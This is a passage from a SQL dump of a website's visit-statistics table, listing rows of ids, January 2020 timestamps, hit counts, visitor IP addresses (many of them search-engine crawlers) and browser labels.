0,'66.249.64.26','chrome'),(473726,1578272731,2,2,0,0,'66.249.64.28','chrome'),(473727,1578272741,3,3,0,0,'66.249.64.27','chrome'),(473728,1578273281,1,1,0,0,'66.249.70.33','chrome'),(473729,1578273545,3,3,0,0,'66.249.64.26','chrome'),(473730,1578273908,3,3,0,0,'157.55.39.210','other'),(473731,1578274836,1,1,0,0,'157.55.39.210','other'),(473732,1578274903,1,1,0,0,'8.29.198.25','other'),(473733,1578275244,1,1,0,0,'66.249.70.33','chrome'),(473734,1578275245,1,1,0,0,'178.154.171.134','other'),(473735,1578275398,1,1,0,0,'185.15.56.22','other'),(473736,1578275931,1,1,0,0,'8.29.198.27','other'),(473737,1578276272,1,1,0,0,'178.154.171.134','other'),(473738,1578276318,1,1,0,0,'178.154.171.127','other'),(473739,1578276755,2,2,0,0,'207.46.13.29','other'),(473740,1578277812,1,1,0,0,'66.249.70.62','chrome'),(473741,1578277902,1,1,0,0,'66.249.64.28','chrome'),(473742,1578279319,1,1,0,0,'87.250.224.90','other'),(473743,1578279344,1,1,0,0,'66.249.70.62','chrome'),(473744,1578280102,1,1,0,0,'66.249.64.28','chrome'),(473745,1578281573,1,1,0,0,'34.214.194.145','chrome'),(473746,1578281576,1,1,0,0,'52.41.211.72','other'),(473747,1578282804,1,1,0,0,'207.46.13.211','other'),(473748,1578282869,1,1,0,0,'66.249.64.28','chrome'),(473749,1578283007,1,1,0,0,'66.249.70.33','chrome'),(473750,1578283382,1,1,0,0,'31.13.115.18','other'),(473751,1578283588,2,2,0,0,'66.249.64.26','chrome'),(473752,1578284285,1,1,0,0,'91.121.171.104','other'),(473753,1578285041,3,1,2,0,'207.46.13.29',''),(473754,1578285229,7,7,0,0,'66.249.64.26','chrome'),(473755,1578285469,1,1,0,0,'66.249.70.36','chrome'),(473756,1578285483,1,1,0,0,'207.46.13.29','other'),(473757,1578285714,2,2,0,0,'66.249.64.27','chrome'),(473758,1578285736,2,2,0,0,'42.236.10.114','chrome'),(473759,1578285738,1,1,0,0,'66.249.64.28','chrome'),(473760,1578285771,1,1,0,0,'8.29.198.27','other'),(473761,1578286346,1,1,0,0,'95.108.181.103','other'),(473762,1578286795,1,1,0,0,'8.29.198.25','other'),(473763,1578287299,1,1,0,0,'170.244.93.210','chrome'),(473764,1578287354,2,2,0,0,'207.46.13.211','other'),(473765,1578287467,1,1,0,0,'17.58.101.25','other'),(473766,1578287953,2,2,0,0,'157.55.39.210','other'),(473767,1578288134,6,6,0,0,'66.249.64.26','chrome'),(473768,1578288468,1,1,0,0,'178.154.171.127','other'),(473769,1578288498,1,1,0,0,'207.46.13.29','other'),(473770,1578288683,1,1,0,0,'46.211.1.150','chrome'),(473771,1578289353,1,1,0,0,'184.94.240.92','firefox'),(473772,1578289585,1,1,0,0,'13.66.139.0','other'),(473773,1578289588,1,1,0,0,'62.205.134.182','other'),(473774,1578289631,1,1,0,0,'66.249.64.27','chrome'),(473775,1578289722,1,1,0,0,'207.46.13.29','other'),(473776,1578289890,1,1,0,0,'66.249.64.28','chrome'),(473777,1578290140,1,1,0,0,'37.9.113.10','other'),(473778,1578291705,1,1,0,0,'66.249.64.26','chrome'),(473779,1578291757,1,1,0,0,'104.245.34.9','chrome'),(473780,1578292186,1,1,0,0,'207.46.13.211','other'),(473781,1578293254,1,1,0,0,'93.73.100.170','other'),(473782,1578293283,1,1,0,0,'178.154.171.134','other'),(473783,1578293442,1,1,0,0,'66.249.64.26','chrome'),(473784,1578294823,1,1,0,0,'79.98.240.154','chrome'),(473785,1578295175,1,1,0,0,'178.154.171.127','other'),(473786,1578295218,1,1,0,0,'31.13.115.11','other'),(473788,1578295224,1,1,0,0,'94.131.219.244','chrome'),(473789,1578295253,1,1,0,0,'178.154.171.134','other'),(473790,1578296123,1,1,0,0,'37.229.195.198','chrome'),(473791,1578296265,1,1,0,0,'178.154.171.134','other'),(473792,1578296636,1,1,0,0,'8.29.198.27','other'),(473793,1578296852,1,1,0,0,'157.55.39.210','other'),(473794,1578297200,3,3,0,0,'66.249.64.26','chrome'),(473795,1578297269,1,1,0,0,'176.67.30.154','chrome'),(473796,1578297628,1,1,0,0,'178.154.171.134','other'),(473797,1578297642,1,1,0,0,'66.249.64.28','chrome'),(473798,1578297665,1,1,0,0,'8.29.198.26','other'),(473799,1578297708,2,2,0,0,'66.249.64.27','chrome'),(473800,1578298234,1,1,0,0,'69.171.251.35','other'),(473801,1578298235,1,1,0,0,'173.252.127.38','other'),(473802,1578298944,1,1,0,0,'66.249.64.28','chrome'),(473803,1578299001,1,1,0,0,'66.249.64.27','chrome'),(473804,1578299170,1,1,0,0,'66.249.64.26','chrome'),(473805,1578299469,1,1,0,0,'96.54.241.136','other'),(473806,1578299696,1,1,0,0,'66.249.70.62','chrome'),(473807,1578299802,1,1,0,0,'207.46.13.29','other'),(473808,1578299809,1,1,0,0,'157.55.39.210','other'),(473809,1578300430,1,1,0,0,'207.46.13.211','other'),(473810,1578300758,1,1,0,0,'66.249.64.26','chrome'),(473811,1578301205,1,1,0,0,'157.55.39.210','other'),(473812,1578301608,1,1,0,0,'66.249.64.27','chrome'),(473813,1578301935,3,3,0,0,'178.154.171.134','other'),(473814,1578302373,1,1,0,0,'178.150.203.248','other'),(473815,1578302408,1,1,0,0,'217.76.202.15','chrome'),(473816,1578302411,1,1,0,0,'37.73.32.137','chrome'),(473817,1578302415,1,1,0,0,'94.153.96.184','chrome'),(473818,1578302484,1,1,0,0,'13.66.139.0','other'),(473819,1578302494,1,1,0,0,'94.178.183.68','chrome'),(473820,1578302772,1,1,0,0,'93.72.245.37','chrome'),(473821,1578303039,1,1,0,0,'66.249.64.26','chrome'),(473822,1578303117,1,1,0,0,'34.231.243.145','chrome'),(473823,1578303173,1,1,0,0,'66.249.88.143','chrome'),(473824,1578303180,1,1,0,0,'66.249.88.146','chrome'),(473825,1578303182,1,1,0,0,'66.249.83.199','chrome'),(473826,1578303241,3,3,0,0,'213.109.225.20','chrome'),(473827,1578303315,1,1,0,0,'66.249.64.28','chrome'),(473828,1578303337,1,1,0,0,'66.249.64.27','chrome'),(473829,1578303379,3,3,0,0,'91.200.233.154','other'),(473830,1578303864,1,1,0,0,'5.58.18.57','chrome'),(473831,1578304299,1,1,0,0,'178.154.171.134','other'),(473832,1578304698,1,1,0,0,'213.179.236.86','chrome'),(473833,1578304728,2,2,0,0,'66.249.64.26','chrome'),(473834,1578304772,1,1,0,0,'5.58.25.130','chrome'),(473835,1578304774,1,1,0,0,'94.244.134.136','chrome'),(473836,1578304967,2,2,0,0,'66.249.64.28','chrome'),(473837,1578305075,1,1,0,0,'31.13.115.16','other'),(473838,1578305076,1,1,0,0,'31.13.115.6','other'),(473839,1578305541,2,2,0,0,'207.46.13.211','other'),(473840,1578305649,1,1,0,0,'157.55.39.210','other'),(473841,1578306102,1,1,0,0,'207.46.13.77','other'),(473842,1578306136,1,1,0,0,'109.86.39.170','chrome'),(473843,1578306179,2,2,0,0,'66.249.64.26','chrome'),(473844,1578306495,1,1,0,0,'178.154.171.134','other'),(473845,1578306639,2,2,0,0,'66.249.64.28','chrome'),(473846,1578307460,1,1,0,0,'178.154.171.134','other'),(473847,1578307493,1,1,0,0,'8.29.198.25','other'),(473848,1578307748,1,1,0,0,'188.163.37.211','chrome'),(473849,1578307952,2,2,0,0,'66.249.64.27','chrome'),(473850,1578308027,1,1,0,0,'31.13.115.3','other'),(473851,1578308394,1,1,0,0,'178.154.171.134','other'),(473852,1578308489,1,1,0,0,'66.249.64.28','chrome'),(473853,1578308533,1,1,0,0,'8.29.198.27','other'),(473854,1578308550,1,1,0,0,'66.102.9.161','chrome'),(473855,1578309294,1,1,0,0,'157.55.39.210','other'),(473856,1578309472,1,1,0,0,'195.114.147.147','chrome'),(473857,1578310081,1,1,0,0,'109.74.154.72','chrome'),(473858,1578310176,1,1,0,0,'157.55.39.181','other'),(473859,1578310242,1,1,0,0,'83.25.27.154','chrome'),(473860,1578310294,1,1,0,0,'31.13.103.6','other'),(473861,1578310423,1,1,0,0,'178.154.171.134','other'),(473862,1578311095,1,1,0,0,'207.46.13.211','other'),(473863,1578311102,1,1,0,0,'91.224.44.108','chrome'),(473864,1578311382,2,2,0,0,'176.37.93.58','chrome'),(473865,1578311401,2,2,0,0,'157.55.39.137','other'),(473866,1578311409,1,1,0,0,'195.5.38.211','other'),(473867,1578311900,1,1,0,0,'79.110.131.53','chrome'),(473868,1578311940,1,1,0,0,'66.249.64.27','chrome'),(473869,1578312088,1,1,0,0,'31.13.115.2','other'),(473870,1578312513,1,1,0,0,'37.46.231.102','chrome'),(473871,1578312550,2,2,0,0,'178.154.171.134','other'),(473872,1578312604,1,1,0,0,'31.43.241.100','chrome'),(473873,1578312730,1,1,0,0,'157.55.39.181','other'),(473874,1578313309,2,2,0,0,'157.55.39.137','other'),(473875,1578313319,1,1,0,0,'66.249.64.28','chrome'),(473876,1578313970,2,2,0,0,'66.249.64.26','chrome'),(473877,1578314036,1,1,0,0,'192.99.149.195','firefox'),(473878,1578314334,2,2,0,0,'66.249.64.28','chrome'),(473879,1578314461,1,1,0,0,'185.96.188.12','chrome'),(473880,1578315170,1,1,0,0,'93.76.36.201','chrome'),(473881,1578315189,1,1,0,0,'66.249.64.27','chrome'),(473882,1578315392,2,1,1,0,'157.55.39.181',''),(473883,1578315432,2,2,0,0,'66.249.64.26','chrome'),(473884,1578315472,1,1,0,0,'91.236.250.243','chrome'),(473885,1578315504,1,1,0,0,'66.249.70.62','chrome'),(473886,1578315881,1,1,0,0,'172.58.207.36','chrome'),(473887,1578315891,1,1,0,0,'195.135.245.170','other'),(473888,1578316501,1,1,0,0,'192.166.112.218','chrome'),(473889,1578316538,1,1,0,0,'178.137.141.45','chrome'),(473890,1578316637,1,1,0,0,'94.244.145.153','chrome'),(473891,1578316781,1,1,0,0,'194.44.97.82','chrome'),(473892,1578316883,2,2,0,0,'66.249.64.28','chrome'),(473893,1578317219,1,1,0,0,'195.211.144.26','chrome'),(473894,1578317271,1,1,0,0,'66.249.64.27','chrome'),(473895,1578317749,1,1,0,0,'37.115.32.51','chrome'),(473896,1578318304,1,1,0,0,'37.54.138.40','chrome'),(473897,1578318380,1,1,0,0,'8.29.198.25','other'),(473898,1578318480,1,1,0,0,'46.173.96.65','other'),(473899,1578318482,1,1,0,0,'66.249.64.27','chrome'),(473900,1578318532,1,1,0,0,'109.87.112.158','chrome'),(473901,1578318876,1,1,0,0,'178.154.171.134','other'),(473902,1578318915,1,1,0,0,'95.134.77.206','chrome'),(473903,1578319099,1,1,0,0,'92.112.153.221','chrome'),(473904,1578319378,1,1,0,0,'66.249.64.26','chrome'),(473905,1578319438,1,1,0,0,'66.249.64.28','chrome'),(473906,1578319472,1,1,0,0,'95.135.57.200','chrome'),(473907,1578319483,1,1,0,0,'8.29.198.26','other'),(473908,1578319638,1,1,0,0,'82.145.209.185','other'),(473909,1578319802,1,1,0,0,'66.249.70.62','chrome'),(473910,1578319827,1,1,0,0,'31.129.245.10','chrome'),(473911,1578319901,1,1,0,0,'178.133.15.59','chrome'),(473912,1578320402,1,1,0,0,'37.73.111.63','other'),(473913,1578321034,1,1,0,0,'88.154.14.184','chrome'),(473914,1578321035,1,1,0,0,'77.109.30.11','chrome'),(473915,1578321167,1,1,0,0,'185.183.92.37','chrome'),(473916,1578321247,1,1,0,0,'66.249.64.28','chrome'),(473917,1578321652,1,1,0,0,'66.249.64.26','chrome'),(473918,1578322152,1,1,0,0,'188.163.84.148','chrome'),(473919,1578322187,2,2,0,0,'157.55.39.137','other'),(473920,1578322805,1,1,0,0,'66.249.64.26','chrome'),(473921,1578322847,1,1,0,0,'188.190.4.89','chrome'),(473922,1578322924,1,1,0,0,'66.249.70.62','chrome'),(473923,1578323229,1,1,0,0,'178.154.171.134','other'),(473924,1578323264,1,1,0,0,'66.249.64.27','chrome'),(473925,1578323316,1,1,0,0,'188.122.20.104','other'),(473926,1578323700,1,1,0,0,'31.43.31.157','chrome'),(473927,1578323785,2,2,0,0,'157.55.39.137','other'),(473928,1578324073,1,1,0,0,'46.211.133.7','chrome'),(473929,1578324542,1,1,0,0,'66.249.64.28','chrome'),(473930,1578324562,1,1,0,0,'157.55.39.181','other'),(473931,1578324624,1,1,0,0,'86.111.71.86','chrome'),(473932,1578324857,1,1,0,0,'157.55.39.105','other'),(473933,1578324864,1,1,0,0,'66.249.64.26','chrome'),(473934,1578325122,1,1,0,0,'93.76.236.90','chrome'),(473935,1578325124,1,1,0,0,'172.58.143.228','chrome'),(473936,1578325189,1,1,0,0,'178.54.128.71','chrome'),(473937,1578325468,1,1,0,0,'46.211.137.4','chrome'),(473938,1578325746,1,1,0,0,'37.73.111.63','other'),(473939,1578325808,1,1,0,0,'46.211.93.41','chrome'),(473940,1578325982,1,1,0,0,'94.153.99.114','chrome'),(473941,1578325999,1,1,0,0,'176.36.90.172','chrome'),(473942,1578326394,2,2,0,0,'157.55.39.164','other'),(473943,1578326442,1,1,0,0,'178.154.171.134','other'),(473944,1578326461,1,1,0,0,'46.133.230.252','firefox'),(473945,1578326949,1,1,0,0,'188.230.16.7','chrome'),(473946,1578327475,1,1,0,0,'94.153.102.180','chrome'),(473947,1578327594,1,1,0,0,'157.55.39.137','other'),(473948,1578327882,1,1,0,0,'91.225.201.178','firefox'),(473949,1578328130,1,1,0,0,'178.154.171.127','other'),(473950,1578328271,1,1,0,0,'46.211.218.25','chrome'),(473951,1578328296,1,1,0,0,'93.72.82.176','chrome'),(473952,1578328547,1,1,0,0,'37.53.61.135','chrome'),(473953,1578328721,1,1,0,0,'46.200.0.160','chrome'),(473954,1578328751,1,1,0,0,'66.249.64.27','chrome'),(473955,1578328938,1,1,0,0,'178.54.128.71','chrome'),(473956,1578329251,1,1,0,0,'8.29.198.26','other'),(473957,1578329523,1,1,0,0,'5.58.236.144','other'),(473958,1578329524,1,1,0,0,'178.154.171.134','other'),(473959,1578329559,1,1,0,0,'91.196.178.175','chrome'),(473960,1578329642,1,1,0,0,'157.55.39.164','other'),(473961,1578329746,1,0,1,0,'157.55.39.210',''),(473962,1578329949,1,1,0,0,'157.55.39.181','other'),(473963,1578330377,1,1,0,0,'178.54.164.51','chrome'),(473964,1578330384,1,1,0,0,'66.102.9.161','chrome'),(473965,1578330390,1,1,0,0,'8.29.198.26','other'),(473966,1578330473,1,1,0,0,'91.245.78.89','chrome'),(473967,1578330508,1,1,0,0,'178.154.171.134','other'),(473968,1578330523,1,1,0,0,'157.55.39.210','other'),(473969,1578330655,1,1,0,0,'91.217.13.31','other'),(473970,1578330673,1,1,0,0,'66.249.64.26','chrome'),(473971,1578330756,2,2,0,0,'66.249.64.27','chrome'),(473972,1578331193,1,1,0,0,'46.211.132.103','chrome'),(473973,1578331417,1,1,0,0,'46.211.33.53','chrome'),(473974,1578331650,2,2,0,0,'178.154.171.134','other'),(473975,1578331855,2,2,0,0,'66.249.64.27','chrome'),(473976,1578332015,1,1,0,0,'68.36.224.34','other'),(473977,1578332162,1,1,0,0,'46.211.6.81','other'),(473978,1578332168,1,1,0,0,'195.211.63.34','chrome'),(473979,1578332191,1,1,0,0,'91.210.23.35','chrome'),(473980,1578332418,1,1,0,0,'188.230.2.67','chrome'),(473981,1578332506,1,1,0,0,'79.110.129.99','chrome'),(473982,1578332615,1,1,0,0,'78.99.179.177','chrome'),(473983,1578332709,1,1,0,0,'66.249.64.26','chrome'),(473984,1578332792,1,1,0,0,'46.211.81.118','chrome'),(473985,1578332900,1,1,0,0,'66.249.64.28','chrome'),(473986,1578333302,1,1,0,0,'173.252.83.5','other'),(473987,1578333464,1,1,0,0,'37.73.3.196','chrome'),(473988,1578333509,1,1,0,0,'66.249.64.27','chrome'),(473989,1578333730,1,1,0,0,'194.50.254.226','chrome'),(473990,1578333815,1,1,0,0,'68.36.224.34','other'),(473991,1578333879,1,1,0,0,'91.209.11.236','other'),(473992,1578333885,1,1,0,0,'46.211.142.64','chrome'),(473993,1578334262,1,1,0,0,'66.249.64.28','chrome'),(473994,1578334529,1,1,0,0,'94.153.103.94','chrome'),(473995,1578334697,1,1,0,0,'88.154.85.21','chrome'),(473996,1578334745,1,1,0,0,'13.66.139.0','other'),(473997,1578334964,1,1,0,0,'157.55.39.210','other'),(473998,1578335042,1,1,0,0,'93.72.82.176','chrome'),(473999,1578335243,1,1,0,0,'178.154.171.134','other'),(474000,1578335326,2,2,0,0,'157.55.39.164','other'),(474001,1578335719,1,1,0,0,'178.133.199.202','chrome'),(474002,1578335747,1,1,0,0,'66.249.64.27','chrome'),(474003,1578335811,2,2,0,0,'157.55.39.181','other'),(474004,1578336320,2,1,1,0,'66.249.70.33',''),(474005,1578336553,1,1,0,0,'66.249.64.28','chrome'),(474006,1578336713,1,1,0,0,'176.227.245.18','chrome'),(474007,1578336744,1,1,0,0,'66.249.64.27','chrome'),(474008,1578336822,1,1,0,0,'93.74.75.138','other'),(474009,1578337073,1,1,0,0,'141.8.142.86','other'),(474010,1578337082,1,1,0,0,'5.45.207.87','other'),(474011,1578337315,1,1,0,0,'46.200.175.219','chrome'),(474012,1578337505,1,1,0,0,'157.55.39.210','other'),(474013,1578337516,1,1,0,0,'157.55.39.181','other'),(474014,1578337601,1,1,0,0,'178.54.128.71','chrome'),(474015,1578338036,1,1,0,0,'178.133.52.77','other'),(474016,1578338246,1,1,0,0,'66.249.64.26','chrome'),(474017,1578338502,1,1,0,0,'46.173.96.65','other'),(474018,1578338683,1,1,0,0,'178.154.171.134','other'),(474019,1578339057,2,2,0,0,'66.249.64.27','chrome'),(474020,1578339362,1,1,0,0,'83.7.180.148','other'),(474021,1578339678,2,2,0,0,'66.249.64.28','chrome'),(474022,1578339729,1,1,0,0,'193.0.221.174','chrome'),(474023,1578339745,1,1,0,0,'194.44.210.231','chrome'),(474024,1578339747,1,1,0,0,'157.55.39.181','other'),(474025,1578339849,1,1,0,0,'94.153.105.156','chrome'),(474026,1578340121,1,1,0,0,'31.13.115.4','other'),(474027,1578340169,1,1,0,0,'8.29.198.27','other'),(474028,1578340233,1,1,0,0,'66.249.70.33','chrome'),(474029,1578340313,1,1,0,0,'157.55.39.210','other'),(474030,1578340770,1,1,0,0,'93.73.234.21','firefox'),(474031,1578340998,1,1,0,0,'93.170.189.208','chrome'),(474032,1578341072,2,0,2,0,'157.55.39.181',''),(474033,1578341181,1,1,0,0,'91.196.177.69','chrome'),(474034,1578341184,1,1,0,0,'157.55.39.164','other'),(474035,1578341275,1,1,0,0,'8.29.198.25','other'),(474036,1578341277,1,1,0,0,'178.154.171.127','other'),(474037,1578341553,1,0,1,0,'66.249.64.28',''),(474038,1578342000,1,1,0,0,'66.249.64.27','chrome'),(474039,1578342236,2,2,0,0,'95.213.141.126','opera'),(474040,1578342381,1,1,0,0,'209.17.97.106','other'),(474041,1578342449,1,1,0,0,'178.154.171.127','other'),(474042,1578342979,1,1,0,0,'66.249.64.28','chrome'),(474043,1578343725,1,1,0,0,'178.150.31.13','chrome'),(474044,1578343734,1,1,0,0,'91.197.220.134','chrome'),(474045,1578344186,1,0,1,0,'66.249.64.27',''),(474046,1578344448,1,1,0,0,'178.154.171.134','other'),(474047,1578345016,1,1,0,0,'66.249.70.62','chrome'),(474048,1578345021,1,1,0,0,'46.211.144.80','chrome'),(474049,1578345039,2,2,0,0,'66.249.64.26','chrome'),(474050,1578345164,1,1,0,0,'46.200.222.233','firefox'),(474051,1578345536,1,1,0,0,'178.154.171.127','other'),(474052,1578345546,1,1,0,0,'66.249.70.36','chrome'),(474053,1578347791,1,1,0,0,'66.249.70.62','chrome'),(474054,1578348032,1,1,0,0,'178.154.171.134','other'),(474055,1578348279,1,1,0,0,'157.55.39.210','other'),(474056,1578348675,1,1,0,0,'78.111.185.175','chrome'),(474057,1578348944,2,2,0,0,'157.55.39.181','other'),(474058,1578349011,1,0,1,0,'157.55.39.164',''),(474059,1578349516,1,1,0,0,'209.17.96.202','other'),(474060,1578349610,2,1,1,0,'157.55.39.164',''),(474061,1578349641,2,2,0,0,'66.249.64.28','chrome'),(474062,1578349862,1,1,0,0,'91.196.178.59','chrome'),(474063,1578350095,1,1,0,0,'66.249.70.36','chrome'),(474064,1578350114,1,1,0,0,'188.231.225.224','other'),(474065,1578351055,1,1,0,0,'8.29.198.25','other'),(474066,1578351499,1,1,0,0,'66.249.64.28','chrome'),(474067,1578351794,2,2,0,0,'157.55.39.164','other'),(474068,1578352157,1,1,0,0,'8.29.198.26','other'),(474069,1578352329,1,1,0,0,'178.154.171.134','other'),(474070,1578352585,1,1,0,0,'66.249.64.26','chrome'),(474071,1578353235,1,1,0,0,'66.249.70.33','chrome'),(474072,1578354096,2,2,0,0,'66.249.64.27','chrome'),(474073,1578355050,2,2,0,0,'66.249.64.28','chrome'),(474074,1578355062,3,3,0,0,'66.249.64.26','chrome'),(474075,1578355578,2,2,0,0,'207.46.13.243','other'),(474076,1578355580,1,1,0,0,'157.55.39.210','other'),(474077,1578355761,1,1,0,0,'93.72.82.176','chrome'),(474078,1578355839,1,1,0,0,'66.249.70.62','chrome'),(474079,1578356507,2,2,0,0,'66.249.64.28','chrome'),(474080,1578356665,1,1,0,0,'157.55.39.210','other'),(474081,1578357068,1,1,0,0,'66.249.70.33','chrome'),(474082,1578357501,1,1,0,0,'66.249.64.28','chrome'),(474083,1578357535,1,1,0,0,'66.249.64.26','chrome'),(474084,1578357952,1,1,0,0,'178.154.171.134','other'),(474085,1578358460,1,1,0,0,'66.249.64.27','chrome'),(474086,1578358512,1,1,0,0,'62.205.134.182','other'),(474087,1578358528,1,1,0,0,'66.249.70.33','chrome'),(474088,1578359558,1,1,0,0,'157.55.39.164','other'),(474089,1578359584,1,1,0,0,'167.71.102.243','other'),(474090,1578359590,2,2,0,0,'66.249.64.28','chrome'),(474091,1578359660,1,1,0,0,'167.71.241.216','other'),(474092,1578359924,1,1,0,0,'178.154.171.134','other'),(474093,1578360522,1,1,0,0,'95.216.2.253','other'),(474094,1578360927,1,0,1,0,'207.46.13.243',''),(474095,1578361123,2,2,0,0,'157.55.39.210','other'),(474096,1578361180,3,2,1,0,'207.46.13.243',''),(474097,1578361503,1,1,0,0,'54.185.129.198','chrome'),(474098,1578361507,1,1,0,0,'35.162.70.167','other'),(474099,1578361840,2,2,0,0,'66.249.64.26','chrome'),(474100,1578361938,1,1,0,0,'8.29.198.27','other'),(474101,1578361969,1,1,0,0,'141.8.142.164','other'),(474102,1578362055,1,1,0,0,'207.46.13.243','other'),(474103,1578362222,2,2,0,0,'66.249.70.36','chrome'),(474104,1578362916,1,1,0,0,'178.154.171.134','other'),(474105,1578363031,1,1,0,0,'8.29.198.27','other'),(474106,1578363520,1,1,0,0,'66.249.70.36','chrome'),(474107,1578364338,1,1,0,0,'157.55.39.92','other'),(474108,1578364390,2,2,0,0,'66.249.70.33','chrome'),(474109,1578364431,1,1,0,0,'66.249.64.26','chrome'),(474110,1578366417,1,1,0,0,'95.108.181.104','other'),(474111,1578366432,1,1,0,0,'95.108.213.55','other'),(474112,1578366517,2,2,0,0,'157.55.39.210','other'),(474113,1578366635,1,1,0,0,'66.249.64.28','chrome'),(474114,1578366654,1,1,0,0,'66.249.64.27','chrome'),(474115,1578366963,1,1,0,0,'202.112.51.54','firefox'),(474116,1578367306,1,1,0,0,'207.46.13.243','other'),(474117,1578367574,1,1,0,0,'46.211.128.128','chrome'),(474118,1578367793,1,1,0,0,'157.55.39.210','other'),(474119,1578368888,1,1,0,0,'66.249.70.36','chrome'),(474120,1578371282,2,2,0,0,'178.154.171.134','other'),(474121,1578371396,1,1,0,0,'66.249.64.28','chrome'),(474122,1578371398,1,1,0,0,'207.46.13.243','other'),(474123,1578371811,1,1,0,0,'66.249.70.36','chrome'),(474124,1578371813,1,0,1,0,'157.55.39.92',''),(474125,1578372025,4,3,1,0,'157.55.39.92',''),(474126,1578372491,1,1,0,0,'157.55.39.164','other'),(474127,1578372817,1,1,0,0,'8.29.198.26','other'),(474128,1578373092,1,1,0,0,'178.154.171.134','other'),(474129,1578373494,1,1,0,0,'157.55.39.210','other'),(474130,1578373782,1,0,1,0,'157.55.39.164',''),(474131,1578373897,1,1,0,0,'8.29.198.27','other'),(474132,1578374330,1,1,0,0,'93.170.118.114','chrome'),(474133,1578374699,1,0,1,0,'157.55.39.164',''),(474134,1578374745,1,1,0,0,'46.135.24.163','chrome'),(474135,1578374906,1,1,0,0,'178.154.171.134','other'),(474136,1578375178,1,1,0,0,'46.211.90.207','chrome'),(474137,1578375672,1,1,0,0,'87.250.224.90','other'),(474138,1578375861,1,1,0,0,'178.154.171.134','other'),(474139,1578375915,1,1,0,0,'178.154.171.127','other'),(474140,1578376009,1,1,0,0,'62.205.134.182','other'),(474141,1578376926,1,1,0,0,'66.249.64.28','chrome'),(474142,1578377023,1,1,0,0,'178.154.171.134','other'),(474143,1578377632,1,1,0,0,'157.55.39.92','other'),(474144,1578377814,1,1,0,0,'66.249.70.36','chrome'),(474145,1578378047,1,1,0,0,'66.249.70.33','chrome'),(474146,1578378105,1,1,0,0,'46.203.190.233','chrome'),(474147,1578378450,1,1,0,0,'46.211.100.20','chrome'),(474148,1578378638,1,1,0,0,'81.209.177.145','other'),(474149,1578378883,1,1,0,0,'188.163.122.55','chrome'),(474150,1578379208,1,1,0,0,'178.154.171.127','other'),(474151,1578379272,7,7,0,0,'35.225.174.227','firefox'),(474152,1578379414,1,1,0,0,'66.249.64.28','chrome'),(474153,1578379416,2,2,0,0,'66.249.64.26','chrome'),(474154,1578380153,1,1,0,0,'178.154.171.134','other'),(474155,1578380520,1,1,0,0,'157.55.39.92','other'),(474156,1578380924,1,1,0,0,'91.86.213.231','chrome'),(474157,1578381160,1,1,0,0,'157.55.39.96','other'),(474158,1578381544,2,2,0,0,'157.55.39.164','other'),(474159,1578381961,1,1,0,0,'77.123.85.117','firefox'),(474160,1578382900,1,1,0,0,'178.251.107.251','other'),(474161,1578383278,1,1,0,0,'146.120.97.15','chrome'),(474162,1578383461,1,1,0,0,'78.159.42.202','chrome'),(474163,1578383674,4,4,0,0,'66.249.64.28','chrome'),(474164,1578383693,1,1,0,0,'8.29.198.27','other'),(474165,1578383694,2,2,0,0,'66.249.70.36','chrome'),(474166,1578383701,13,13,0,0,'66.249.64.26','chrome'),(474167,1578383708,3,3,0,0,'66.249.64.27','chrome'),(474168,1578383848,1,1,0,0,'46.211.135.158','chrome'),(474169,1578383877,2,2,0,0,'66.249.70.62','chrome'),(474170,1578383981,1,1,0,0,'109.251.234.153','chrome'),(474171,1578384029,1,1,0,0,'66.249.70.33','chrome'),(474172,1578384794,1,1,0,0,'8.29.198.27','other'),(474173,1578384836,1,1,0,0,'157.55.39.210','other'),(474174,1578384853,1,1,0,0,'31.13.103.5','other'),(474175,1578384854,1,1,0,0,'31.13.103.9','other'),(474176,1578384862,1,1,0,0,'77.111.244.46','chrome'),(474177,1578384888,3,3,0,0,'66.249.64.27','chrome'),(474178,1578384909,3,3,0,0,'66.249.70.36','chrome'),(474179,1578384916,2,2,0,0,'66.249.64.28','chrome'),(474180,1578385134,2,2,0,0,'195.211.231.135','chrome'),(474181,1578385194,3,3,0,0,'66.249.64.26','chrome'),(474182,1578385238,1,1,0,0,'194.146.139.121','chrome'),(474183,1578385722,1,1,0,0,'178.154.171.134','other'),(474184,1578385801,1,1,0,0,'194.44.170.113','chrome'),(474185,1578385908,1,1,0,0,'178.251.106.146','chrome'),(474186,1578386369,1,1,0,0,'31.0.36.246','chrome'),(474187,1578386545,1,0,1,0,'66.249.70.36',''),(474188,1578386693,1,1,0,0,'46.200.255.247','chrome'),(474189,1578386827,38,38,0,0,'35.233.194.70','firefox'),(474190,1578386829,2,2,0,0,'207.46.13.187','other'),(474191,1578386834,2,2,0,0,'35.233.194.70','other'),(474192,1578387047,1,1,0,0,'95.132.211.209','chrome'),(474193,1578387156,1,1,0,0,'178.151.238.199','chrome'),(474194,1578387458,1,0,1,0,'66.249.70.36',''),(474195,1578387594,1,1,0,0,'91.210.251.159','chrome'),(474196,1578387652,1,1,0,0,'178.251.106.146','chrome'),(474197,1578388127,1,1,0,0,'66.249.70.36','chrome'),(474198,1578388207,1,1,0,0,'93.183.196.124','chrome'),(474199,1578388556,1,1,0,0,'176.119.80.40','chrome'),(474200,1578388703,1,1,0,0,'46.133.1.210','chrome'),(474201,1578388844,1,1,0,0,'66.249.64.28','chrome'),(474202,1578388859,1,1,0,0,'195.34.207.20','chrome'),(474203,1578388887,1,1,0,0,'94.73.46.226','firefox'),(474204,1578388961,1,1,0,0,'5.53.114.99','chrome'),(474205,1578389131,1,1,0,0,'88.154.228.32','chrome'),(474206,1578389227,3,3,0,0,'207.46.13.187','other'),(474207,1578389232,3,3,0,0,'157.55.39.210','other'),(474208,1578389305,1,1,0,0,'193.186.9.80','chrome'),(474209,1578389329,1,1,0,0,'82.193.124.203','chrome'),(474210,1578389474,1,1,0,0,'212.90.50.22','chrome'),(474211,1578390216,1,1,0,0,'66.249.64.27','chrome'),(474212,1578390315,1,1,0,0,'213.202.253.44','other'),(474213,1578390481,1,1,0,0,'66.249.64.26','chrome'),(474214,1578390669,1,1,0,0,'178.154.171.127','other'),(474215,1578390707,1,0,1,0,'66.249.64.28',''),(474216,1578390811,1,1,0,0,'66.102.9.161','chrome'),(474217,1578391090,1,1,0,0,'207.46.13.187','other'),(474218,1578391159,2,2,0,0,'66.249.64.27','chrome'),(474219,1578391161,1,1,0,0,'18.191.217.3','chrome'),(474220,1578391385,1,1,0,0,'178.93.224.73','firefox'),(474221,1578391435,1,1,0,0,'46.211.154.141','chrome'),(474222,1578391495,2,1,1,0,'157.55.39.210',''),(474223,1578392144,24,24,0,0,'173.234.153.122','other'),(474224,1578392342,1,1,0,0,'93.73.236.223','chrome